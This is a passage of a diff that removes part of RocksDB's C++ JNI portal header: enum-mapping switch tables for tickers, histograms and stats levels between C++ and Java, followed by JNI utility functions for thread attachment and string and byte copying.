-      case rocksdb::Tickers::BLOCK_CACHE_BYTES_READ:
-        return 0x12;
-      case rocksdb::Tickers::BLOCK_CACHE_BYTES_WRITE:
-        return 0x13;
-      case rocksdb::Tickers::BLOOM_FILTER_USEFUL:
-        return 0x14;
-      case rocksdb::Tickers::PERSISTENT_CACHE_HIT:
-        return 0x15;
-      case rocksdb::Tickers::PERSISTENT_CACHE_MISS:
-        return 0x16;
-      case rocksdb::Tickers::SIM_BLOCK_CACHE_HIT:
-        return 0x17;
-      case rocksdb::Tickers::SIM_BLOCK_CACHE_MISS:
-        return 0x18;
-      case rocksdb::Tickers::MEMTABLE_HIT:
-        return 0x19;
-      case rocksdb::Tickers::MEMTABLE_MISS:
-        return 0x1A;
-      case rocksdb::Tickers::GET_HIT_L0:
-        return 0x1B;
-      case rocksdb::Tickers::GET_HIT_L1:
-        return 0x1C;
-      case rocksdb::Tickers::GET_HIT_L2_AND_UP:
-        return 0x1D;
-      case rocksdb::Tickers::COMPACTION_KEY_DROP_NEWER_ENTRY:
-        return 0x1E;
-      case rocksdb::Tickers::COMPACTION_KEY_DROP_OBSOLETE:
-        return 0x1F;
-      case rocksdb::Tickers::COMPACTION_KEY_DROP_RANGE_DEL:
-        return 0x20;
-      case rocksdb::Tickers::COMPACTION_KEY_DROP_USER:
-        return 0x21;
-      case rocksdb::Tickers::COMPACTION_RANGE_DEL_DROP_OBSOLETE:
-        return 0x22;
-      case rocksdb::Tickers::NUMBER_KEYS_WRITTEN:
-        return 0x23;
-      case rocksdb::Tickers::NUMBER_KEYS_READ:
-        return 0x24;
-      case rocksdb::Tickers::NUMBER_KEYS_UPDATED:
-        return 0x25;
-      case rocksdb::Tickers::BYTES_WRITTEN:
-        return 0x26;
-      case rocksdb::Tickers::BYTES_READ:
-        return 0x27;
-      case rocksdb::Tickers::NUMBER_DB_SEEK:
-        return 0x28;
-      case rocksdb::Tickers::NUMBER_DB_NEXT:
-        return 0x29;
-      case rocksdb::Tickers::NUMBER_DB_PREV:
-        return 0x2A;
-      case rocksdb::Tickers::NUMBER_DB_SEEK_FOUND:
-        return 0x2B;
-      case rocksdb::Tickers::NUMBER_DB_NEXT_FOUND:
-        return 0x2C;
-      case rocksdb::Tickers::NUMBER_DB_PREV_FOUND:
-        return 0x2D;
-      case rocksdb::Tickers::ITER_BYTES_READ:
-        return 0x2E;
-      case rocksdb::Tickers::NO_FILE_CLOSES:
-        return 0x2F;
-      case rocksdb::Tickers::NO_FILE_OPENS:
-        return 0x30;
-      case rocksdb::Tickers::NO_FILE_ERRORS:
-        return 0x31;
-      case rocksdb::Tickers::STALL_L0_SLOWDOWN_MICROS:
-        return 0x32;
-      case rocksdb::Tickers::STALL_MEMTABLE_COMPACTION_MICROS:
-        return 0x33;
-      case rocksdb::Tickers::STALL_L0_NUM_FILES_MICROS:
-        return 0x34;
-      case rocksdb::Tickers::STALL_MICROS:
-        return 0x35;
-      case rocksdb::Tickers::DB_MUTEX_WAIT_MICROS:
-        return 0x36;
-      case rocksdb::Tickers::RATE_LIMIT_DELAY_MILLIS:
-        return 0x37;
-      case rocksdb::Tickers::NO_ITERATORS:
-        return 0x38;
-      case rocksdb::Tickers::NUMBER_MULTIGET_CALLS:
-        return 0x39;
-      case rocksdb::Tickers::NUMBER_MULTIGET_KEYS_READ:
-        return 0x3A;
-      case rocksdb::Tickers::NUMBER_MULTIGET_BYTES_READ:
-        return 0x3B;
-      case rocksdb::Tickers::NUMBER_FILTERED_DELETES:
-        return 0x3C;
-      case rocksdb::Tickers::NUMBER_MERGE_FAILURES:
-        return 0x3D;
-      case rocksdb::Tickers::BLOOM_FILTER_PREFIX_CHECKED:
-        return 0x3E;
-      case rocksdb::Tickers::BLOOM_FILTER_PREFIX_USEFUL:
-        return 0x3F;
-      case rocksdb::Tickers::NUMBER_OF_RESEEKS_IN_ITERATION:
-        return 0x40;
-      case rocksdb::Tickers::GET_UPDATES_SINCE_CALLS:
-        return 0x41;
-      case rocksdb::Tickers::BLOCK_CACHE_COMPRESSED_MISS:
-        return 0x42;
-      case rocksdb::Tickers::BLOCK_CACHE_COMPRESSED_HIT:
-        return 0x43;
-      case rocksdb::Tickers::BLOCK_CACHE_COMPRESSED_ADD:
-        return 0x44;
-      case rocksdb::Tickers::BLOCK_CACHE_COMPRESSED_ADD_FAILURES:
-        return 0x45;
-      case rocksdb::Tickers::WAL_FILE_SYNCED:
-        return 0x46;
-      case rocksdb::Tickers::WAL_FILE_BYTES:
-        return 0x47;
-      case rocksdb::Tickers::WRITE_DONE_BY_SELF:
-        return 0x48;
-      case rocksdb::Tickers::WRITE_DONE_BY_OTHER:
-        return 0x49;
-      case rocksdb::Tickers::WRITE_TIMEDOUT:
-        return 0x4A;
-      case rocksdb::Tickers::WRITE_WITH_WAL:
-        return 0x4B;
-      case rocksdb::Tickers::COMPACT_READ_BYTES:
-        return 0x4C;
-      case rocksdb::Tickers::COMPACT_WRITE_BYTES:
-        return 0x4D;
-      case rocksdb::Tickers::FLUSH_WRITE_BYTES:
-        return 0x4E;
-      case rocksdb::Tickers::NUMBER_DIRECT_LOAD_TABLE_PROPERTIES:
-        return 0x4F;
-      case rocksdb::Tickers::NUMBER_SUPERVERSION_ACQUIRES:
-        return 0x50;
-      case rocksdb::Tickers::NUMBER_SUPERVERSION_RELEASES:
-        return 0x51;
-      case rocksdb::Tickers::NUMBER_SUPERVERSION_CLEANUPS:
-        return 0x52;
-      case rocksdb::Tickers::NUMBER_BLOCK_COMPRESSED:
-        return 0x53;
-      case rocksdb::Tickers::NUMBER_BLOCK_DECOMPRESSED:
-        return 0x54;
-      case rocksdb::Tickers::NUMBER_BLOCK_NOT_COMPRESSED:
-        return 0x55;
-      case rocksdb::Tickers::MERGE_OPERATION_TOTAL_TIME:
-        return 0x56;
-      case rocksdb::Tickers::FILTER_OPERATION_TOTAL_TIME:
-        return 0x57;
-      case rocksdb::Tickers::ROW_CACHE_HIT:
-        return 0x58;
-      case rocksdb::Tickers::ROW_CACHE_MISS:
-        return 0x59;
-      case rocksdb::Tickers::READ_AMP_ESTIMATE_USEFUL_BYTES:
-        return 0x5A;
-      case rocksdb::Tickers::READ_AMP_TOTAL_READ_BYTES:
-        return 0x5B;
-      case rocksdb::Tickers::NUMBER_RATE_LIMITER_DRAINS:
-        return 0x5C;
-      case rocksdb::Tickers::TICKER_ENUM_MAX:
-        return 0x5D;
-      
-      default:
-        // undefined/default
-        return 0x0;
-    }
-  }
-
-  // Returns the equivalent C++ rocksdb::Tickers enum for the
-  // provided Java org.rocksdb.TickerType
-  static rocksdb::Tickers toCppTickers(jbyte jticker_type) {
-    switch(jticker_type) {
-      case 0x0:
-        return rocksdb::Tickers::BLOCK_CACHE_MISS;
-      case 0x1:
-        return rocksdb::Tickers::BLOCK_CACHE_HIT;
-      case 0x2:
-        return rocksdb::Tickers::BLOCK_CACHE_ADD;
-      case 0x3:
-        return rocksdb::Tickers::BLOCK_CACHE_ADD_FAILURES;
-      case 0x4:
-        return rocksdb::Tickers::BLOCK_CACHE_INDEX_MISS;
-      case 0x5:
-        return rocksdb::Tickers::BLOCK_CACHE_INDEX_HIT;
-      case 0x6:
-        return rocksdb::Tickers::BLOCK_CACHE_INDEX_ADD;
-      case 0x7:
-        return rocksdb::Tickers::BLOCK_CACHE_INDEX_BYTES_INSERT;
-      case 0x8:
-        return rocksdb::Tickers::BLOCK_CACHE_INDEX_BYTES_EVICT;
-      case 0x9:
-        return rocksdb::Tickers::BLOCK_CACHE_FILTER_MISS;
-      case 0xA:
-        return rocksdb::Tickers::BLOCK_CACHE_FILTER_HIT;
-      case 0xB:
-        return rocksdb::Tickers::BLOCK_CACHE_FILTER_ADD;
-      case 0xC:
-        return rocksdb::Tickers::BLOCK_CACHE_FILTER_BYTES_INSERT;
-      case 0xD:
-        return rocksdb::Tickers::BLOCK_CACHE_FILTER_BYTES_EVICT;
-      case 0xE:
-        return rocksdb::Tickers::BLOCK_CACHE_DATA_MISS;
-      case 0xF:
-        return rocksdb::Tickers::BLOCK_CACHE_DATA_HIT;
-      case 0x10:
-        return rocksdb::Tickers::BLOCK_CACHE_DATA_ADD;
-      case 0x11:
-        return rocksdb::Tickers::BLOCK_CACHE_DATA_BYTES_INSERT;
-      case 0x12:
-        return rocksdb::Tickers::BLOCK_CACHE_BYTES_READ;
-      case 0x13:
-        return rocksdb::Tickers::BLOCK_CACHE_BYTES_WRITE;
-      case 0x14:
-        return rocksdb::Tickers::BLOOM_FILTER_USEFUL;
-      case 0x15:
-        return rocksdb::Tickers::PERSISTENT_CACHE_HIT;
-      case 0x16:
-        return rocksdb::Tickers::PERSISTENT_CACHE_MISS;
-      case 0x17:
-        return rocksdb::Tickers::SIM_BLOCK_CACHE_HIT;
-      case 0x18:
-        return rocksdb::Tickers::SIM_BLOCK_CACHE_MISS;
-      case 0x19:
-        return rocksdb::Tickers::MEMTABLE_HIT;
-      case 0x1A:
-        return rocksdb::Tickers::MEMTABLE_MISS;
-      case 0x1B:
-        return rocksdb::Tickers::GET_HIT_L0;
-      case 0x1C:
-        return rocksdb::Tickers::GET_HIT_L1;
-      case 0x1D:
-        return rocksdb::Tickers::GET_HIT_L2_AND_UP;
-      case 0x1E:
-        return rocksdb::Tickers::COMPACTION_KEY_DROP_NEWER_ENTRY;
-      case 0x1F:
-        return rocksdb::Tickers::COMPACTION_KEY_DROP_OBSOLETE;
-      case 0x20:
-        return rocksdb::Tickers::COMPACTION_KEY_DROP_RANGE_DEL;
-      case 0x21:
-        return rocksdb::Tickers::COMPACTION_KEY_DROP_USER;
-      case 0x22:
-        return rocksdb::Tickers::COMPACTION_RANGE_DEL_DROP_OBSOLETE;
-      case 0x23:
-        return rocksdb::Tickers::NUMBER_KEYS_WRITTEN;
-      case 0x24:
-        return rocksdb::Tickers::NUMBER_KEYS_READ;
-      case 0x25:
-        return rocksdb::Tickers::NUMBER_KEYS_UPDATED;
-      case 0x26:
-        return rocksdb::Tickers::BYTES_WRITTEN;
-      case 0x27:
-        return rocksdb::Tickers::BYTES_READ;
-      case 0x28:
-        return rocksdb::Tickers::NUMBER_DB_SEEK;
-      case 0x29:
-        return rocksdb::Tickers::NUMBER_DB_NEXT;
-      case 0x2A:
-        return rocksdb::Tickers::NUMBER_DB_PREV;
-      case 0x2B:
-        return rocksdb::Tickers::NUMBER_DB_SEEK_FOUND;
-      case 0x2C:
-        return rocksdb::Tickers::NUMBER_DB_NEXT_FOUND;
-      case 0x2D:
-        return rocksdb::Tickers::NUMBER_DB_PREV_FOUND;
-      case 0x2E:
-        return rocksdb::Tickers::ITER_BYTES_READ;
-      case 0x2F:
-        return rocksdb::Tickers::NO_FILE_CLOSES;
-      case 0x30:
-        return rocksdb::Tickers::NO_FILE_OPENS;
-      case 0x31:
-        return rocksdb::Tickers::NO_FILE_ERRORS;
-      case 0x32:
-        return rocksdb::Tickers::STALL_L0_SLOWDOWN_MICROS;
-      case 0x33:
-        return rocksdb::Tickers::STALL_MEMTABLE_COMPACTION_MICROS;
-      case 0x34:
-        return rocksdb::Tickers::STALL_L0_NUM_FILES_MICROS;
-      case 0x35:
-        return rocksdb::Tickers::STALL_MICROS;
-      case 0x36:
-        return rocksdb::Tickers::DB_MUTEX_WAIT_MICROS;
-      case 0x37:
-        return rocksdb::Tickers::RATE_LIMIT_DELAY_MILLIS;
-      case 0x38:
-        return rocksdb::Tickers::NO_ITERATORS;
-      case 0x39:
-        return rocksdb::Tickers::NUMBER_MULTIGET_CALLS;
-      case 0x3A:
-        return rocksdb::Tickers::NUMBER_MULTIGET_KEYS_READ;
-      case 0x3B:
-        return rocksdb::Tickers::NUMBER_MULTIGET_BYTES_READ;
-      case 0x3C:
-        return rocksdb::Tickers::NUMBER_FILTERED_DELETES;
-      case 0x3D:
-        return rocksdb::Tickers::NUMBER_MERGE_FAILURES;
-      case 0x3E:
-        return rocksdb::Tickers::BLOOM_FILTER_PREFIX_CHECKED;
-      case 0x3F:
-        return rocksdb::Tickers::BLOOM_FILTER_PREFIX_USEFUL;
-      case 0x40:
-        return rocksdb::Tickers::NUMBER_OF_RESEEKS_IN_ITERATION;
-      case 0x41:
-        return rocksdb::Tickers::GET_UPDATES_SINCE_CALLS;
-      case 0x42:
-        return rocksdb::Tickers::BLOCK_CACHE_COMPRESSED_MISS;
-      case 0x43:
-        return rocksdb::Tickers::BLOCK_CACHE_COMPRESSED_HIT;
-      case 0x44:
-        return rocksdb::Tickers::BLOCK_CACHE_COMPRESSED_ADD;
-      case 0x45:
-        return rocksdb::Tickers::BLOCK_CACHE_COMPRESSED_ADD_FAILURES;
-      case 0x46:
-        return rocksdb::Tickers::WAL_FILE_SYNCED;
-      case 0x47:
-        return rocksdb::Tickers::WAL_FILE_BYTES;
-      case 0x48:
-        return rocksdb::Tickers::WRITE_DONE_BY_SELF;
-      case 0x49:
-        return rocksdb::Tickers::WRITE_DONE_BY_OTHER;
-      case 0x4A:
-        return rocksdb::Tickers::WRITE_TIMEDOUT;
-      case 0x4B:
-        return rocksdb::Tickers::WRITE_WITH_WAL;
-      case 0x4C:
-        return rocksdb::Tickers::COMPACT_READ_BYTES;
-      case 0x4D:
-        return rocksdb::Tickers::COMPACT_WRITE_BYTES;
-      case 0x4E:
-        return rocksdb::Tickers::FLUSH_WRITE_BYTES;
-      case 0x4F:
-        return rocksdb::Tickers::NUMBER_DIRECT_LOAD_TABLE_PROPERTIES;
-      case 0x50:
-        return rocksdb::Tickers::NUMBER_SUPERVERSION_ACQUIRES;
-      case 0x51:
-        return rocksdb::Tickers::NUMBER_SUPERVERSION_RELEASES;
-      case 0x52:
-        return rocksdb::Tickers::NUMBER_SUPERVERSION_CLEANUPS;
-      case 0x53:
-        return rocksdb::Tickers::NUMBER_BLOCK_COMPRESSED;
-      case 0x54:
-        return rocksdb::Tickers::NUMBER_BLOCK_DECOMPRESSED;
-      case 0x55:
-        return rocksdb::Tickers::NUMBER_BLOCK_NOT_COMPRESSED;
-      case 0x56:
-        return rocksdb::Tickers::MERGE_OPERATION_TOTAL_TIME;
-      case 0x57:
-        return rocksdb::Tickers::FILTER_OPERATION_TOTAL_TIME;
-      case 0x58:
-        return rocksdb::Tickers::ROW_CACHE_HIT;
-      case 0x59:
-        return rocksdb::Tickers::ROW_CACHE_MISS;
-      case 0x5A:
-        return rocksdb::Tickers::READ_AMP_ESTIMATE_USEFUL_BYTES;
-      case 0x5B:
-        return rocksdb::Tickers::READ_AMP_TOTAL_READ_BYTES;
-      case 0x5C:
-        return rocksdb::Tickers::NUMBER_RATE_LIMITER_DRAINS;
-      case 0x5D:
-        return rocksdb::Tickers::TICKER_ENUM_MAX;
-
-      default:
-        // undefined/default
-        return rocksdb::Tickers::BLOCK_CACHE_MISS;
-    }
-  }
-};
-
-// The portal class for org.rocksdb.HistogramType
-class HistogramTypeJni {
- public:
-  // Returns the equivalent org.rocksdb.HistogramType for the provided
-  // C++ rocksdb::Histograms enum
-  static jbyte toJavaHistogramsType(
-      const rocksdb::Histograms& histograms) {
-    switch(histograms) {
-      case rocksdb::Histograms::DB_GET:
-        return 0x0;
-      case rocksdb::Histograms::DB_WRITE:
-        return 0x1;
-      case rocksdb::Histograms::COMPACTION_TIME:
-        return 0x2;
-      case rocksdb::Histograms::SUBCOMPACTION_SETUP_TIME:
-        return 0x3;
-      case rocksdb::Histograms::TABLE_SYNC_MICROS:
-        return 0x4;
-      case rocksdb::Histograms::COMPACTION_OUTFILE_SYNC_MICROS:
-        return 0x5;
-      case rocksdb::Histograms::WAL_FILE_SYNC_MICROS:
-        return 0x6;
-      case rocksdb::Histograms::MANIFEST_FILE_SYNC_MICROS:
-        return 0x7;
-      case rocksdb::Histograms::TABLE_OPEN_IO_MICROS:
-        return 0x8;
-      case rocksdb::Histograms::DB_MULTIGET:
-        return 0x9;
-      case rocksdb::Histograms::READ_BLOCK_COMPACTION_MICROS:
-        return 0xA;
-      case rocksdb::Histograms::READ_BLOCK_GET_MICROS:
-        return 0xB;
-      case rocksdb::Histograms::WRITE_RAW_BLOCK_MICROS:
-        return 0xC;
-      case rocksdb::Histograms::STALL_L0_SLOWDOWN_COUNT:
-        return 0xD;
-      case rocksdb::Histograms::STALL_MEMTABLE_COMPACTION_COUNT:
-        return 0xE;
-      case rocksdb::Histograms::STALL_L0_NUM_FILES_COUNT:
-        return 0xF;
-      case rocksdb::Histograms::HARD_RATE_LIMIT_DELAY_COUNT:
-        return 0x10;
-      case rocksdb::Histograms::SOFT_RATE_LIMIT_DELAY_COUNT:
-        return 0x11;
-      case rocksdb::Histograms::NUM_FILES_IN_SINGLE_COMPACTION:
-        return 0x12;
-      case rocksdb::Histograms::DB_SEEK:
-        return 0x13;
-      case rocksdb::Histograms::WRITE_STALL:
-        return 0x14;
-      case rocksdb::Histograms::SST_READ_MICROS:
-        return 0x15;
-      case rocksdb::Histograms::NUM_SUBCOMPACTIONS_SCHEDULED:
-        return 0x16;
-      case rocksdb::Histograms::BYTES_PER_READ:
-        return 0x17;
-      case rocksdb::Histograms::BYTES_PER_WRITE:
-        return 0x18;
-      case rocksdb::Histograms::BYTES_PER_MULTIGET:
-        return 0x19;
-      case rocksdb::Histograms::BYTES_COMPRESSED:
-        return 0x1A;
-      case rocksdb::Histograms::BYTES_DECOMPRESSED:
-        return 0x1B;
-      case rocksdb::Histograms::COMPRESSION_TIMES_NANOS:
-        return 0x1C;
-      case rocksdb::Histograms::DECOMPRESSION_TIMES_NANOS:
-        return 0x1D;
-      case rocksdb::Histograms::READ_NUM_MERGE_OPERANDS:
-        return 0x1E;
-      case rocksdb::Histograms::HISTOGRAM_ENUM_MAX:
-        return 0x1F;
-
-      default:
-        // undefined/default
-        return 0x0;
-    }
-  }
-
-  // Returns the equivalent C++ rocksdb::Histograms enum for the
-  // provided Java org.rocksdb.HistogramsType
-  static rocksdb::Histograms toCppHistograms(jbyte jhistograms_type) {
-    switch(jhistograms_type) {
-      case 0x0:
-        return rocksdb::Histograms::DB_GET;
-      case 0x1:
-        return rocksdb::Histograms::DB_WRITE;
-      case 0x2:
-        return rocksdb::Histograms::COMPACTION_TIME;
-      case 0x3:
-        return rocksdb::Histograms::SUBCOMPACTION_SETUP_TIME;
-      case 0x4:
-        return rocksdb::Histograms::TABLE_SYNC_MICROS;
-      case 0x5:
-        return rocksdb::Histograms::COMPACTION_OUTFILE_SYNC_MICROS;
-      case 0x6:
-        return rocksdb::Histograms::WAL_FILE_SYNC_MICROS;
-      case 0x7:
-        return rocksdb::Histograms::MANIFEST_FILE_SYNC_MICROS;
-      case 0x8:
-        return rocksdb::Histograms::TABLE_OPEN_IO_MICROS;
-      case 0x9:
-        return rocksdb::Histograms::DB_MULTIGET;
-      case 0xA:
-        return rocksdb::Histograms::READ_BLOCK_COMPACTION_MICROS;
-      case 0xB:
-        return rocksdb::Histograms::READ_BLOCK_GET_MICROS;
-      case 0xC:
-        return rocksdb::Histograms::WRITE_RAW_BLOCK_MICROS;
-      case 0xD:
-        return rocksdb::Histograms::STALL_L0_SLOWDOWN_COUNT;
-      case 0xE:
-        return rocksdb::Histograms::STALL_MEMTABLE_COMPACTION_COUNT;
-      case 0xF:
-        return rocksdb::Histograms::STALL_L0_NUM_FILES_COUNT;
-      case 0x10:
-        return rocksdb::Histograms::HARD_RATE_LIMIT_DELAY_COUNT;
-      case 0x11:
-        return rocksdb::Histograms::SOFT_RATE_LIMIT_DELAY_COUNT;
-      case 0x12:
-        return rocksdb::Histograms::NUM_FILES_IN_SINGLE_COMPACTION;
-      case 0x13:
-        return rocksdb::Histograms::DB_SEEK;
-      case 0x14:
-        return rocksdb::Histograms::WRITE_STALL;
-      case 0x15:
-        return rocksdb::Histograms::SST_READ_MICROS;
-      case 0x16:
-        return rocksdb::Histograms::NUM_SUBCOMPACTIONS_SCHEDULED;
-      case 0x17:
-        return rocksdb::Histograms::BYTES_PER_READ;
-      case 0x18:
-        return rocksdb::Histograms::BYTES_PER_WRITE;
-      case 0x19:
-        return rocksdb::Histograms::BYTES_PER_MULTIGET;
-      case 0x1A:
-        return rocksdb::Histograms::BYTES_COMPRESSED;
-      case 0x1B:
-        return rocksdb::Histograms::BYTES_DECOMPRESSED;
-      case 0x1C:
-        return rocksdb::Histograms::COMPRESSION_TIMES_NANOS;
-      case 0x1D:
-        return rocksdb::Histograms::DECOMPRESSION_TIMES_NANOS;
-      case 0x1E:
-        return rocksdb::Histograms::READ_NUM_MERGE_OPERANDS;
-      case 0x1F:
-        return rocksdb::Histograms::HISTOGRAM_ENUM_MAX;
-
-      default:
-        // undefined/default
-        return rocksdb::Histograms::DB_GET;
-    }
-  }
-};
-
-// The portal class for org.rocksdb.StatsLevel
-class StatsLevelJni {
- public:
-  // Returns the equivalent org.rocksdb.StatsLevel for the provided
-  // C++ rocksdb::StatsLevel enum
-  static jbyte toJavaStatsLevel(
-      const rocksdb::StatsLevel& stats_level) {
-    switch(stats_level) {
-      case rocksdb::StatsLevel::kExceptDetailedTimers:
-        return 0x0;
-      case rocksdb::StatsLevel::kExceptTimeForMutex:
-        return 0x1;
-      case rocksdb::StatsLevel::kAll:
-        return 0x2;
-
-      default:
-        // undefined/default
-        return 0x0;
-    }
-  }
-
-  // Returns the equivalent C++ rocksdb::StatsLevel enum for the
-  // provided Java org.rocksdb.StatsLevel
-  static rocksdb::StatsLevel toCppStatsLevel(jbyte jstats_level) {
-    switch(jstats_level) {
-      case 0x0:
-        return rocksdb::StatsLevel::kExceptDetailedTimers;
-      case 0x1:
-        return rocksdb::StatsLevel::kExceptTimeForMutex;
-      case 0x2:
-        return rocksdb::StatsLevel::kAll;
-
-      default:
-        // undefined/default
-        return rocksdb::StatsLevel::kExceptDetailedTimers;
-    }
-  }
-};
-
-// various utility functions for working with RocksDB and JNI
-class JniUtil {
- public:
-    /**
-     * Obtains a reference to the JNIEnv from
-     * the JVM
-     *
-     * If the current thread is not attached to the JavaVM
-     * then it will be attached so as to retrieve the JNIEnv
-     *
-     * If a thread is attached, it must later be manually
-     * released by calling JavaVM::DetachCurrentThread.
-     * This can be handled by always matching calls to this
-     * function with calls to {@link JniUtil::releaseJniEnv(JavaVM*, jboolean)}
-     *
-     * @param jvm (IN) A pointer to the JavaVM instance
-     * @param attached (OUT) A pointer to a boolean which
-     *     will be set to JNI_TRUE if we had to attach the thread
-     *
-     * @return A pointer to the JNIEnv or nullptr if a fatal error
-     *     occurs and the JNIEnv cannot be retrieved
-     */
-    static JNIEnv* getJniEnv(JavaVM* jvm, jboolean* attached) {
-      assert(jvm != nullptr);
-
-      JNIEnv *env;
-      const jint env_rs = jvm->GetEnv(reinterpret_cast<void**>(&env),
-          JNI_VERSION_1_2);
-
-      if(env_rs == JNI_OK) {
-        // current thread is already attached, return the JNIEnv
-        *attached = JNI_FALSE;
-        return env;
-      } else if(env_rs == JNI_EDETACHED) {
-        // current thread is not attached, attempt to attach
-        const jint rs_attach = jvm->AttachCurrentThread(reinterpret_cast<void**>(&env), NULL);
-        if(rs_attach == JNI_OK) {
-          *attached = JNI_TRUE;
-          return env;
-        } else {
-          // error, could not attach the thread
-          std::cerr << "JniUtil::getJinEnv - Fatal: could not attach current thread to JVM!" << std::endl;
-          return nullptr;
-        }
-      } else if(env_rs == JNI_EVERSION) {
-        // error, JDK does not support JNI_VERSION_1_2+
-        std::cerr << "JniUtil::getJinEnv - Fatal: JDK does not support JNI_VERSION_1_2" << std::endl;
-        return nullptr;
-      } else {
-        std::cerr << "JniUtil::getJinEnv - Fatal: Unknown error: env_rs=" << env_rs << std::endl;
-        return nullptr;
-      }
-    }
-
-    /**
-     * Counterpart to {@link JniUtil::getJniEnv(JavaVM*, jboolean*)}
-     *
-     * Detachess the current thread from the JVM if it was previously
-     * attached
-     *
-     * @param jvm (IN) A pointer to the JavaVM instance
-     * @param attached (IN) JNI_TRUE if we previously had to attach the thread
-     *     to the JavaVM to get the JNIEnv
-     */
-    static void releaseJniEnv(JavaVM* jvm, jboolean& attached) {
-      assert(jvm != nullptr);
-      if(attached == JNI_TRUE) {
-        const jint rs_detach = jvm->DetachCurrentThread();
-        assert(rs_detach == JNI_OK);
-        if(rs_detach != JNI_OK) {
-          std::cerr << "JniUtil::getJinEnv - Warn: Unable to detach current thread from JVM!" << std::endl;
-        }
-      }
-    }
-
-    /**
-     * Copies a Java String[] to a C++ std::vector<std::string>
-     *
-     * @param env (IN) A pointer to the java environment
-     * @param jss (IN) The Java String array to copy
-     * @param has_exception (OUT) will be set to JNI_TRUE
-     *     if an OutOfMemoryError or ArrayIndexOutOfBoundsException
-     *     exception occurs
-     *
-     * @return A std::vector<std:string> containing copies of the Java strings
-     */
-    static std::vector<std::string> copyStrings(JNIEnv* env,
-        jobjectArray jss, jboolean* has_exception) {
-          return rocksdb::JniUtil::copyStrings(env, jss,
-              env->GetArrayLength(jss), has_exception);
-    }
-
-    /**
-     * Copies a Java String[] to a C++ std::vector<std::string>
-     *
-     * @param env (IN) A pointer to the java environment
-     * @param jss (IN) The Java String array to copy
-     * @param jss_len (IN) The length of the Java String array to copy
-     * @param has_exception (OUT) will be set to JNI_TRUE
-     *     if an OutOfMemoryError or ArrayIndexOutOfBoundsException
-     *     exception occurs
-     *
-     * @return A std::vector<std:string> containing copies of the Java strings
-     */
-    static std::vector<std::string> copyStrings(JNIEnv* env,
-        jobjectArray jss, const jsize jss_len, jboolean* has_exception) {
-      std::vector<std::string> strs;
-      for (jsize i = 0; i < jss_len; i++) {
-        jobject js = env->GetObjectArrayElement(jss, i);
-        if(env->ExceptionCheck()) {
-          // exception thrown: ArrayIndexOutOfBoundsException
-          *has_exception = JNI_TRUE;
-          return strs;
-        }
-
-        jstring jstr = static_cast<jstring>(js);
-        const char* str = env->GetStringUTFChars(jstr, nullptr);
-        if(str == nullptr) {
-          // exception thrown: OutOfMemoryError
-          env->DeleteLocalRef(js);
-          *has_exception = JNI_TRUE;
-          return strs;
-        }
-
-        strs.push_back(std::string(str));
-
-        env->ReleaseStringUTFChars(jstr, str);
-        env->DeleteLocalRef(js);
-      }
-
-      *has_exception = JNI_FALSE;
-      return strs;
-    }
-
-    /**
-     * Copies a jstring to a std::string
-     * and releases the original jstring
-     *
-     * If an exception occurs, then JNIEnv::ExceptionCheck()
-     * will have been called
-     *
-     * @param env (IN) A pointer to the java environment
-     * @param js (IN) The java string to copy
-     * @param has_exception (OUT) will be set to JNI_TRUE
-     *     if an OutOfMemoryError exception occurs
-     *
-     * @return A std:string copy of the jstring, or an
-     *     empty std::string if has_exception == JNI_TRUE
-     */
-    static std::string copyString(JNIEnv* env, jstring js,
-        jboolean* has_exception) {
-      const char *utf = env->GetStringUTFChars(js, nullptr);
-      if(utf == nullptr) {
-        // exception thrown: OutOfMemoryError
-        env->ExceptionCheck();
-        *has_exception = JNI_TRUE;
-        return std::string();
-      } else if(env->ExceptionCheck()) {
-        // exception thrown
-        env->ReleaseStringUTFChars(js, utf);
-        *has_exception = JNI_TRUE;
-        return std::string();
-      }
-
-      std::string name(utf);
-      env->ReleaseStringUTFChars(js, utf);
-      *has_exception = JNI_FALSE;
-      return name;
-    }
-
-    /**
-     * Copies bytes from a std::string to a jByteArray
-     *
-     * @param env A pointer to the java environment
-     * @param bytes The bytes to copy
-     *
-     * @return the Java byte[] or nullptr if an exception occurs
-     */
-    static jbyteArray copyBytes(JNIEnv* env, std::string bytes) {
-      const jsize jlen = static_cast<jsize>(bytes.size());
-
-      jbyteArray jbytes = env->NewByteArray(jlen);
-      if(jbytes == nullptr) {
-        // exception thrown: OutOfMemoryError
-        return nullptr;
-      }
-
-      env->SetByteArrayRegion(jbytes, 0, jlen,
-        const_cast<jbyte*>(reinterpret_cast<const jbyte*>(bytes.c_str())));
-      if(env->ExceptionCheck()) {
-        // exception thrown: ArrayIndexOutOfBoundsException
-        env->DeleteLocalRef(jbytes);
-        return nullptr;
-      }
-
-      return jbytes;
-    }
-
-    /**
-     * Given a Java byte[][] which is an array of java.lang.Strings
-     * where each String is a byte[], the passed function `string_fn`
-     * will be called on each String, the result is the collected by
-     * calling the passed function `collector_fn`
-     *
-     * @param env (IN) A pointer to the java environment
-     * @param jbyte_strings (IN) A Java array of Strings expressed as bytes
-     * @param string_fn (IN) A transform function to call for each String
-     * @param collector_fn (IN) A collector which is called for the result
-     *     of each `string_fn`
-     * @param has_exception (OUT) will be set to JNI_TRUE
-     *     if an ArrayIndexOutOfBoundsException or OutOfMemoryError
-     *     exception occurs
-     */
-    template <typename T> static void byteStrings(JNIEnv* env,
-        jobjectArray jbyte_strings,
-        std::function<T(const char*, const size_t)> string_fn,
-        std::function<void(size_t, T)> collector_fn,
-        jboolean *has_exception) {
-      const jsize jlen = env->GetArrayLength(jbyte_strings);
-
-      for(jsize i = 0; i < jlen; i++) {
-        jobject jbyte_string_obj = env->GetObjectArrayElement(jbyte_strings, i);
-        if(env->ExceptionCheck()) {
-          // exception thrown: ArrayIndexOutOfBoundsException
-          *has_exception = JNI_TRUE;  // signal error
-          return;
-        }
-
-        jbyteArray jbyte_string_ary =
-            reinterpret_cast<jbyteArray>(jbyte_string_obj);
-        T result = byteString(env, jbyte_string_ary, string_fn, has_exception);
-
-        env->DeleteLocalRef(jbyte_string_obj);
-
-        if(*has_exception == JNI_TRUE) {
-          // exception thrown: OutOfMemoryError
-          return;
-        }
-
-        collector_fn(i, result);
-      }
-
-      *has_exception = JNI_FALSE;
-    }
-
-    /**
-     * Given a Java String which is expressed as a Java Byte Array byte[],
-     * the passed function `string_fn` will be called on the String
-     * and the result returned
-     *
-     * @param env (IN) A pointer to the java environment
-     * @param jbyte_string_ary (IN) A Java String expressed in bytes
-     * @param string_fn (IN) A transform function to call on the String
-     * @param has_exception (OUT) will be set to JNI_TRUE
